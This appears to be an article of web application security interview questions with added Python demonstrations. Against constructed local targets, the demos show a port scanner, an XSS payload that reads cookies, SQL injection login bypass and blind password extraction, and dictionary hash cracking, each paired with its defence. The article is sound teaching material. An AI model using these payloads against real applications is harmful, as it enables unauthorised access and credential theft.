According to a survey, 85 percent of Singaporean Chief Information Officers (CIOs) believed that companies will suffer cyber-attacks more often than before, which points to the need for a stronger IT security presence in the organisation. Yet when it comes to hiring, managers are often unsure where to start: the talent pool is full of candidates claiming ninja-level expertise who are not actually ready to build a robust security system.
Therefore, if you are a CEO looking to build a security team or an HR manager hiring for a new web application project but don't know where to start, Synopsys suggests beginning your search with simple, open-ended questions about IT security and then moving on to more detailed ones.
So, are you hiring for such a role now? If so, here is a handy list of web application security interview questions to get you started.
1. Questions regarding basic website and IT knowledge
Start by making sure that candidates understand how websites and applications work in general; this gives you an early sense of how promising they are. Here is a list of questions to assess a candidate's understanding of these topics.
- Explain what happens when you enter "google.com" in a browser's address bar. – This question should give insight into the candidate's understanding of DNS, DHCP, ARP, the TCP and SSL/TLS handshakes, proxies, cookies, session management, HTTP methods such as GET and POST, and so on.
- Are you a Mac, Windows or Linux person? Which OS is more secure? – This is a trick question, as no OS is completely secure; listen for how the candidate reasons about attack surface, patching and configuration rather than for a brand preference.
2. Questions regarding network security
Having started with open-ended general questions, it is now time to move to basic questions that let you gauge the candidate's network security knowledge. Here is the list.
- How would you perform network reconnaissance? – Here you should listen for basic tools and network commands such as Nmap or ping. Hint: scenario questions work well in this area. For example: you are the web administrator for HandlingMoreTrafficThanFacebook.com; how would you prevent a DDoS attack on the website?
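As an added illustration (not from the original article or from Synopsys), the following Python script shows the basic building blocks a candidate is describing when they mention Nmap: a TCP connect scan that classifies ports as open, closed or filtered, and banner grabbing to identify the service behind an open port. It scans a constructed listener on the loopback interface, and the banner string is made up for the example, so it runs offline; against real targets you would of course need authorisation first.

```python
import socket
import threading
from concurrent.futures import ThreadPoolExecutor
from typing import Dict, Iterable


def tcp_connect_scan(host: str, ports: Iterable[int], timeout: float = 0.5) -> Dict[int, str]:
    """TCP connect scan (the technique behind `nmap -sT`): complete the three-way
    handshake on each port and classify the outcome."""
    def probe(port: int):
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            try:
                s.connect((host, port))
                return port, "open"        # SYN/ACK received: a service is listening
            except ConnectionRefusedError:
                return port, "closed"      # RST received: nothing listening
            except OSError:
                return port, "filtered"    # no answer in time: typically a firewall drop

    with ThreadPoolExecutor(max_workers=16) as pool:
        return dict(pool.map(probe, list(ports)))


def grab_banner(host: str, port: int, timeout: float = 1.0) -> str:
    """Service fingerprinting: many daemons (SSH, SMTP, FTP) announce themselves
    as soon as the connection is made."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        return s.recv(128).decode("ascii", "replace").strip()


def _fake_service(srv: socket.socket, banner: bytes) -> None:
    """Constructed loopback listener standing in for a chatty daemon."""
    while True:
        try:
            conn, _ = srv.accept()
        except OSError:
            return                         # listener was closed
        with conn:
            try:
                conn.sendall(banner)
            except OSError:
                pass                       # scanner hung up before reading


def demo() -> dict:
    """Scan one listening port and one closed port on 127.0.0.1, then grab the banner."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))             # port 0: let the OS pick a free port
    srv.listen(5)
    open_port = srv.getsockname()[1]
    # Hypothetical banner, constructed for the example.
    threading.Thread(target=_fake_service,
                     args=(srv, b"SSH-2.0-ExampleDaemon_1.0\r\n"), daemon=True).start()

    tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tmp.bind(("127.0.0.1", 0))
    closed_port = tmp.getsockname()[1]
    tmp.close()                            # released again, so a connect gets RST

    results = tcp_connect_scan("127.0.0.1", [open_port, closed_port])
    banner = grab_banner("127.0.0.1", open_port)
    srv.close()
    return {"open": results[open_port], "closed": results[closed_port], "banner": banner}


if __name__ == "__main__":
    print(demo())
```

A connect scan is noisy (every probe completes a handshake and lands in the target's logs), which is exactly the trade-off a good candidate will raise when asked why Nmap's default SYN scan behaves differently.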
3. Questions regarding web application security
These are the core questions to ask. They give you insight into the candidate's knowledge of common web-based attacks, including SQL injection, XSS, CSRF, remote file inclusion and so on. Here are the questions you should consider asking.
- Which approach is better: a manual security test or an automated security test? – The honest answer is "it depends", so the candidate should be able to compare the pros and cons of both and describe a balanced approach.
- What is the difference between white box and black box testing? Which one is better? – Again, the answer depends on a host of factors such as cost, time, the team's requirements, and so on.
- How would you perform a security/penetration test on a web application covering three scenarios: an unauthenticated test of the log-in page, authenticated tests with one user account, and authenticated tests with multiple user accounts? – The multi-account scenario is where you listen for horizontal and vertical access-control testing.
- Explain a DOM-based cross-site scripting attack.
- Is input validation sufficient to prevent cross-site scripting? – Listen for context-aware output encoding; validation alone is not enough.
- Explain a blind SQL injection attack.
- How does a web application firewall (WAF) detect and prevent attacks?
- What is the difference between authentication and authorisation?
- What is same-origin policy? What is CORS (cross-origin resource sharing)?
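To make the input-validation question concrete, here is an added Python example (not code from the original article) that contrasts a blocklist-style validator with context-aware output encoding. The validator, the template and the payload are constructed for this example. The point it demonstrates is that a value can pass validation and still break out of an HTML attribute, so encoding at output time, for the context the value lands in, is what actually prevents XSS.

```python
import html
import json
import re
from html.parser import HTMLParser

# Blocklist-style "validation" of the kind interviewees often propose:
# reject anything that looks like an HTML tag. (Constructed for this
# example; it is the flawed approach, not a recommendation.)
TAG_LIKE = re.compile(r"<\s*/?\s*[a-z]", re.IGNORECASE)


def naive_validate(value: str) -> bool:
    """True when no tag-like sequence is present; the caller then trusts the value."""
    return TAG_LIKE.search(value) is None


def render_unsafe(display_name: str) -> str:
    """Template that drops the value into two HTML contexts with no encoding."""
    return (f"<p>Welcome, {display_name}</p>\n"
            f'<input name="display_name" value="{display_name}">')


def render_safe(display_name: str) -> str:
    """Same template, but the value is HTML-encoded for the contexts it lands in."""
    enc = html.escape(display_name, quote=True)   # & < > " ' become entities
    return (f"<p>Welcome, {enc}</p>\n"
            f'<input name="display_name" value="{enc}">')


def render_js_safe(display_name: str) -> str:
    """A JavaScript string context needs JavaScript encoding, not HTML encoding."""
    # json.dumps yields a quoted JS string literal; '<' is additionally escaped so
    # a value containing '</script>' cannot close the enclosing script element.
    literal = json.dumps(display_name).replace("<", "\\u003c")
    return f"<script>var displayName = {literal};</script>"


class _AttrCollector(HTMLParser):
    """Records (tag, attribute-name) pairs the way a browser would tokenise them."""
    def __init__(self):
        super().__init__()
        self.seen = []

    def handle_starttag(self, tag, attrs):
        self.seen.extend((tag, name) for name, _ in attrs)


def injected_handlers(markup: str) -> list:
    """Return event-handler attributes (on*) that ended up as real attributes."""
    parser = _AttrCollector()
    parser.feed(markup)
    parser.close()
    return [(tag, name) for tag, name in parser.seen if name.startswith("on")]


# Constructed payload: it contains no '<', so the blocklist passes it, but inside
# value="..." the leading quote closes the attribute and the rest adds a handler.
PAYLOAD = '" autofocus onfocus="alert(document.cookie)'


def demo() -> dict:
    return {
        "passes_validation": naive_validate(PAYLOAD),
        "unsafe_handlers": injected_handlers(render_unsafe(PAYLOAD)),
        "safe_handlers": injected_handlers(render_safe(PAYLOAD)),
    }


if __name__ == "__main__":
    print(demo())
```

The same lesson applies to DOM-based XSS: the sink (`innerHTML`, `eval`, `location`) decides what encoding is needed, and server-side validation never sees the value the client-side code eventually uses.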
Tip: software security is not limited to web applications. Therefore, you can also ask general application security questions about architecture design, mobile security, source code review, reverse engineering and malware analysis, as they relate to the position.
4. Questions regarding web AppSec tools and practical knowledge
Although there is no definitive list of tools, knowledge of some common ones adds much value to a candidate. So, here goes the list.
- Have you taken part in a bug bounty or CTF contest?
- What is your favourite security tool and why?
- What is the most interesting vulnerability you've found? – You can turn this into a scenario. For instance: you have a log-in page with "username" and "password" fields; how do you test it for SQL injection without using any tool?
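The following added Python example (not from the original article; the database, accounts and password values are constructed) walks through the manual log-in page test from the scenario above and then the blind SQL injection question from section 3: probe with a single quote, bypass the password check with a comment sequence, and recover a stored value one character at a time using only the true/false log-in result. The same three steps fail against the parameterised version of the query.

```python
import sqlite3
import string


def build_db() -> sqlite3.Connection:
    """Constructed in-memory users table. Passwords are stored in clear text only
    to keep the demo short; a real application stores salted, slow hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "s3cret"), ("alice", "wonder1")])
    return conn


def login_vulnerable(conn, username: str, password: str) -> bool:
    """String concatenation: user input becomes part of the SQL grammar."""
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return conn.execute(query).fetchone() is not None


def login_safe(conn, username: str, password: str) -> bool:
    """Parameterised query: input is bound as data and never parsed as SQL."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


def probe_single_quote(conn, login) -> bool:
    """Step 1 of the manual test: does a lone quote cause a database error?
    An error (or a changed response) is the first hint that input reaches SQL."""
    try:
        login(conn, "'", "x")
        return False
    except sqlite3.Error:
        return True


def bypass_password_check(conn, login) -> bool:
    """Step 2: close the string and comment out the rest of the WHERE clause
    ('--' starts a comment in SQLite and most other engines)."""
    return login(conn, "admin' --", "not-the-password")


ALPHABET = string.ascii_lowercase + string.digits   # kept small for speed


def blind_extract_password(conn, login, target: str = "admin", max_len: int = 32) -> str:
    """Step 3, boolean-based blind injection: the application reveals only
    'login ok' or 'login failed', so each character of the stored value is
    recovered by asking one yes/no question per guess."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in ALPHABET:
            payload = f"{target}' AND substr(password, {pos}, 1) = '{ch}' --"
            if login(conn, payload, "x"):
                recovered += ch
                break
        else:
            break   # no character matched: end of the stored value
    return recovered


def run_demo() -> dict:
    """Run all three steps against both implementations."""
    conn = build_db()
    results = {}
    for name, login in (("vulnerable", login_vulnerable), ("safe", login_safe)):
        results[name] = {
            "quote_causes_error": probe_single_quote(conn, login),
            "auth_bypassed": bypass_password_check(conn, login),
            "blind_extracted": blind_extract_password(conn, login),
        }
    return results


if __name__ == "__main__":
    print(run_demo())
```

A candidate who has done this by hand will mention the engine-specific details that trip people up, for example that MySQL requires whitespace after `--` (or accepts `#` instead), and that when errors are suppressed you fall back to response differences or time delays as the oracle.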
5. Questions about cryptography
A basic understanding of cryptography is a must for security professionals. Therefore, your candidates should know the common cryptographic attacks and how to prevent them.
- What is the difference between encryption, encoding, and hashing? – Tip: it is better if the candidate can explain with some example algorithms.
- What is the difference between asymmetric and symmetric cryptography?
- Why is the word "password" a bad password? – Here you can listen for concepts such as password crackers, rainbow tables, dictionary attacks, hashing, and salting.
- How does gmail.com ensure that some hacker on the internet is not reading my emails while Gmail delivers them to me? – Listen for an explanation of SSL/TLS, certificate validation, man-in-the-middle attacks, and how to prevent them.
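As an added example (not from the original article), the Python below illustrates the encoding versus hashing versus salting distinction and the "password" question together. The wordlist, the "rainbow table" and the passphrase are constructed for the example, and PBKDF2 stands in for whichever slow password hash your stack uses. It shows that an unsalted hash falls to a single table lookup, that salting defeats the precomputed table but not a dictionary guess, and that a strong passphrase survives both.

```python
import base64
import hashlib
import hmac
import os
from typing import Optional, Tuple

ITERATIONS = 50_000   # deliberately low so the demo runs quickly; tune upwards in production


def encode(data: bytes) -> str:
    """Encoding (Base64 here): reversible and keyless. It hides nothing."""
    return base64.b64encode(data).decode("ascii")


def decode(text: str) -> bytes:
    return base64.b64decode(text)


def unsalted_hash(password: str) -> str:
    """Hashing (SHA-256): one-way, but deterministic, so it can be precomputed."""
    return hashlib.sha256(password.encode()).hexdigest()


def salted_hash(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Salted, iterated hash (PBKDF2-HMAC-SHA256). The random salt makes every
    user's hash unique; the iteration count makes each guess expensive."""
    if salt is None:
        salt = os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


def verify(password: str, salt: bytes, stored: bytes) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, stored)   # constant-time comparison


# Constructed wordlist and "rainbow table" (a precomputed hash -> password map).
# Real tables hold billions of entries, but the principle is the same.
WORDLIST = ["123456", "password", "qwerty", "letmein", "dragon"]
RAINBOW_TABLE = {unsalted_hash(w): w for w in WORDLIST}


def crack_unsalted(stored_hex: str) -> Optional[str]:
    """One dictionary lookup recovers any unsalted hash of a wordlist entry."""
    return RAINBOW_TABLE.get(stored_hex)


def crack_salted(salt: bytes, stored: bytes) -> Optional[str]:
    """The table is useless against a salted hash: every guess must be recomputed
    with this user's salt, at ITERATIONS cost each. A dictionary word still falls."""
    for word in WORDLIST:
        if verify(word, salt, stored):
            return word
    return None


def demo() -> dict:
    weak_unsalted = unsalted_hash("password")
    salt_a, weak_a = salted_hash("password")
    salt_b, weak_b = salted_hash("password")        # same password, second user
    salt_s, strong = salted_hash("correct horse battery staple")
    return {
        "encoding_is_reversible": decode(encode(b"attack at dawn")) == b"attack at dawn",
        "unsalted_hash_reveals_reuse": weak_unsalted == unsalted_hash("password"),
        "salted_hashes_differ_per_user": weak_a != weak_b,
        "unsalted_cracked_by_lookup": crack_unsalted(weak_unsalted),
        "salted_lookup_fails": crack_unsalted(weak_a.hex()),
        "salted_dictionary_word_still_cracked": crack_salted(salt_a, weak_a),
        "strong_passphrase_survives": crack_salted(salt_s, strong),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

A strong answer ties these together: encoding is for transport, hashing is for integrity and password storage, and only encryption (symmetric or asymmetric) protects confidentiality with a key. The "password" case shows why salting and slow hashing help but do not rescue a word that is in every attacker's list.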
6. Questions about soft skills
Here are a few sample questions you can ask about a candidate's soft skills from a technical perspective.
- What security podcasts/blogs/websites do you follow?
- Are you part of any local security group (OWASP chapters/meetup groups)?
- Tell me about a recent security breach that caught your attention and why.
- Explain [common security issue] to me like I’m five years old.
- How would you convince a senior executive to allocate budget for a security activity you think is necessary? – You can play out a scenario here. For example: you are an executive who has just been persuaded by one of your security staff to secure an intranet-only web application; how much would you invest? Listen for concepts such as asset value, impact analysis, risk severity and exposure, which show that the candidate understands risk management, policy and compliance, data breaches and so forth.
- Should we prioritise business requirements over security requirements or vice versa?